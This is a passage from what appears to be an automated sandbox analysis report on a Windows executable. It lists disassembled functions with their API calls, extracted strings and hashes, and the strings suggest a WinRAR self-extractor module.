                                                                                  • Opcode ID: 68a94f5ae92daecdbf35699da2fc860364c25f788e313ebbbbb0cc1054413410
                                                                                  • Instruction ID: 23b291877d650837e066097a40596de3e6734b15b2ed09602c62b275bab86e1f
                                                                                  • Opcode Fuzzy Hash: 68a94f5ae92daecdbf35699da2fc860364c25f788e313ebbbbb0cc1054413410
                                                                                  • Instruction Fuzzy Hash: F83147365393027BE725BF209C06F7BB79CAF83310F18011EF501921C1EB64DA658BA6
                                                                                  Function 0028D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindow.USER32(?,00000005), ref: 0028D6C1
                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0028D6ED
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028D709
                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0028D720
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028D734
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0028D75D
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028D764
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0028D76D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 3820355801-1882779555
                                                                                  • Opcode ID: c19078d991cc9beb2f41bf4d07f8dfc436ee7ad42eb1c147cb94ff52b8495ed4
                                                                                  • Instruction ID: f23c7928917844dceea3b8731b20153efef3dd6cb91b68b47edb207c7ebee531
                                                                                  • Opcode Fuzzy Hash: c19078d991cc9beb2f41bf4d07f8dfc436ee7ad42eb1c147cb94ff52b8495ed4
                                                                                  • Instruction Fuzzy Hash: 8311E77A9533127BE621BB70EC4EFAFB75CAB44712F004112FA51E10D2DA64CE194BA6
                                                                                  Function 00292E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 322700389-393685449
                                                                                  • Opcode ID: c6b947a10c8a4d53260fd99c33e6c34fa36748e1ff9e9a5262a621fc131688fc
                                                                                  • Instruction ID: 3988d7c61df2d0185540402e35a52cc9d16fa87454b8a5311f99f3ada8cda224
                                                                                  • Opcode Fuzzy Hash: c6b947a10c8a4d53260fd99c33e6c34fa36748e1ff9e9a5262a621fc131688fc
                                                                                  • Instruction Fuzzy Hash: 55B16B7292020AEFCF25DFA4C8819AEBBB5FF14310F14415AE8196B222D735DA75CF91
                                                                                  Function 0027AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n(
                                                                                  • API String ID: 3519838083-3321953544
                                                                                  • Opcode ID: a4e5913577b57cf436204db057e6a4f2bfa5c12f50a26bf33d00cab872652ba9
                                                                                  • Instruction ID: 2d7d82d93870a24517cbd10c38ca1cc792ed48bddf80da06dacf9815872adbd0
                                                                                  • Opcode Fuzzy Hash: a4e5913577b57cf436204db057e6a4f2bfa5c12f50a26bf33d00cab872652ba9
                                                                                  • Instruction Fuzzy Hash: D9716D70A10219EFDF14DF64DC99AAFB7B9FF8A710B144159F416A72A0CB30AD01CB50
                                                                                  Function 00276FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00276FAA
                                                                                  • _wcslen.LIBCMT ref: 00277013
                                                                                  • _wcslen.LIBCMT ref: 00277084
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 3122303884-3508440684
                                                                                  • Opcode ID: 87cf4c181cc0f52f992033534f65f1aee52e7e1076bfe8349c9be0a8a514c812
                                                                                  • Instruction ID: 7637b6379472c31c15baf5aec14b85a3ba1c3d3cafcc0dfdd2afb050b143f267
                                                                                  • Opcode Fuzzy Hash: 87cf4c181cc0f52f992033534f65f1aee52e7e1076bfe8349c9be0a8a514c812
                                                                                  • Instruction Fuzzy Hash: 4F412BB1D283457AEF21EB749C86FEEB36C9F05304F008455FA4DA6182D674AA748F21
                                                                                  Function 0028B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028B610
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028B637
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0028B650
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0028B661
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0028B66A
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0028B67E
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0028B694
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 3214253823-2177901306
                                                                                  • Opcode ID: 6e1fc1d6943cbb8ea03489ecffc1ed1e8e192960cddb238c03f221c91c02890e
                                                                                  • Instruction ID: 06d01c24c701fa59c6c9454a4a8665d6fdc985ecb292aa6bf1ae73c7decaa7d8
                                                                                  • Opcode Fuzzy Hash: 6e1fc1d6943cbb8ea03489ecffc1ed1e8e192960cddb238c03f221c91c02890e
                                                                                  • Instruction Fuzzy Hash: FC21B6356222167BD612AF66FD4DF3B3B6DEB46741F050019F604A10E0EB529E21D732
                                                                                  Function 0028FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B460B3A9,00000001,00000000,00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FD99
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE14
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0028FE1F
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE48
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE52
                                                                                  • GetLastError.KERNEL32(80070057,B460B3A9,00000001,00000000,00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE57
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE6A
                                                                                  • GetLastError.KERNEL32(00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE80
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE93
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 1353541977-0
                                                                                  • Opcode ID: 5e8c4c2c6872e03a733262d14dd549f31aea5a68013f7d107060be5a630641da
                                                                                  • Instruction ID: 12194e793add89531b19709ec1baa22c99a584f4adccd15c2567d99cb13aa25f
                                                                                  • Opcode Fuzzy Hash: 5e8c4c2c6872e03a733262d14dd549f31aea5a68013f7d107060be5a630641da
                                                                                  • Instruction Fuzzy Hash: 78413B75A11205ABCB10EF64DD45BAEBBA8EF49710F10423AF905D72D1DB349920CBA0
                                                                                  Function 00279382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00279387
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002793AA
                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002793C9
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • _swprintf.LIBCMT ref: 00279465
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 002794D4
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00279514
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                  • String ID: rtmp%d
                                                                                  • API String ID: 3726343395-3303766350
                                                                                  • Opcode ID: eca3fb902e5e6e7e124f36cfba60096a4a9d65a4e6dfa01d4d08e3a41089f504
                                                                                  • Instruction ID: b02b892636bcf532053ad0b86b267c3a5a7ce0b0688191918a974df135ed0afe
                                                                                  • Opcode Fuzzy Hash: eca3fb902e5e6e7e124f36cfba60096a4a9d65a4e6dfa01d4d08e3a41089f504
                                                                                  • Instruction Fuzzy Hash: E9413171921365A6DF21EB608C55EDE737CAF55380F4088A5B64DB3052EA388BE98F60
                                                                                  Function 00271100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: U($p($z(
                                                                                  • API String ID: 176396367-848644056
                                                                                  • Opcode ID: 0bf0560c7f178b87647970cf8dea1539c139f83b736f5ea802793914017daf40
                                                                                  • Instruction ID: 3f4ca4037b25f02de2bca21cebbabbfbfc061388268470b8ded5202723a36044
                                                                                  • Opcode Fuzzy Hash: 0bf0560c7f178b87647970cf8dea1539c139f83b736f5ea802793914017daf40
                                                                                  • Instruction Fuzzy Hash: 6A41B6719116665BCB15EF68CC4A9DE7BBCEF01311F00401AFD45F7245DA30AE698BA1
                                                                                  Function 00289ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00289EEE
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00289F44
                                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 00289FDB
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00289FE3
                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00289FF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$RectText
                                                                                  • String ID: ($RarHtmlClassName
                                                                                  • API String ID: 3937224194-3469610180
                                                                                  • Opcode ID: f19f1af18cf5319b824279b40ef100251dfb69b448d4339cd604947e71e8b2fa
                                                                                  • Instruction ID: e89c64d1478d616e1678a7ab45d5da153fca03e0b08e5e8e54e9846121eaa1ae
                                                                                  • Opcode Fuzzy Hash: f19f1af18cf5319b824279b40ef100251dfb69b448d4339cd604947e71e8b2fa
                                                                                  • Instruction Fuzzy Hash: 6041E036416212EFDB21AF64EC4DB2B7BA8FF48701F04451AF9499A092CB34DD64CF62
                                                                                  Function 00281218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __aulldiv.LIBCMT ref: 0028122E
                                                                                    • Part of subcall function 0027B146: GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00281251
                                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00281263
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00281274
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281284
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281294
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002812CF
                                                                                  • __aullrem.LIBCMT ref: 00281379
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 1247370737-0
                                                                                  • Opcode ID: a3ab397452d52b2c402eeadf29628ebbd0db313b059b3a2fa1f65a645fbf27ea
                                                                                  • Instruction ID: 0547e3de9747c6c5c2c619d4209f51662d6a6fe9565c6fcb78e837a891e195bb
                                                                                  • Opcode Fuzzy Hash: a3ab397452d52b2c402eeadf29628ebbd0db313b059b3a2fa1f65a645fbf27ea
                                                                                  • Instruction Fuzzy Hash: 524118B5508305AFC710DF65D88496BBBF9FF88314F00892EF59AC2250E734E569CB51
                                                                                  Function 00272210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 00272536
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                  • String ID: ;%u$x%u$xc%u
                                                                                  • API String ID: 3053425827-2277559157
                                                                                  • Opcode ID: 528083db1670d2b44139a385b0697287bac6dd93933e539f49e274a18d25b3f1
                                                                                  • Instruction ID: cd463e112816301c0573fdae6bcccaa253e2692fad4d42c151abe573741e3b3a
                                                                                  • Opcode Fuzzy Hash: 528083db1670d2b44139a385b0697287bac6dd93933e539f49e274a18d25b3f1
                                                                                  • Instruction Fuzzy Hash: 2CF12571624381DBCB15EF348495BBE77995F91300F08856EFC8E9B283CB74896D8B62
                                                                                  Function 00289CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                                  • API String ID: 176396367-3568243669
                                                                                  • Opcode ID: 5f7b0250c3ee6c416db5c125eb3cf09eb05a0424f007f335c55c6d0625bdc414
                                                                                  • Instruction ID: a7b5568b5291927e2a9058b1429fb741bfda9ccc1f2df05a329e2d1ed75caf59
                                                                                  • Opcode Fuzzy Hash: 5f7b0250c3ee6c416db5c125eb3cf09eb05a0424f007f335c55c6d0625bdc414
                                                                                  • Instruction Fuzzy Hash: D151C36E76232395DB30BE25981177663E4DFA1750F6C042BF9C19B2C0FAA58CF18365
                                                                                  Function 0029F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0029FE02,00000000,00000000,00000000,00000000,00000000,0029529F), ref: 0029F6CF
                                                                                  • __fassign.LIBCMT ref: 0029F74A
                                                                                  • __fassign.LIBCMT ref: 0029F765
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0029F78B
                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0029FE02,00000000,?,?,?,?,?,?,?,?,?,0029FE02,00000000), ref: 0029F7AA
                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0029FE02,00000000,?,?,?,?,?,?,?,?,?,0029FE02,00000000), ref: 0029F7E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: 5f45816bc5492438fc535c19bd0c7df1262c80703358f5005ba8a5622078d027
                                                                                  • Instruction ID: a3561cd8e29d3ce3c00fa4ba209763f2c66ec976bda14964e87843b3329f8c62
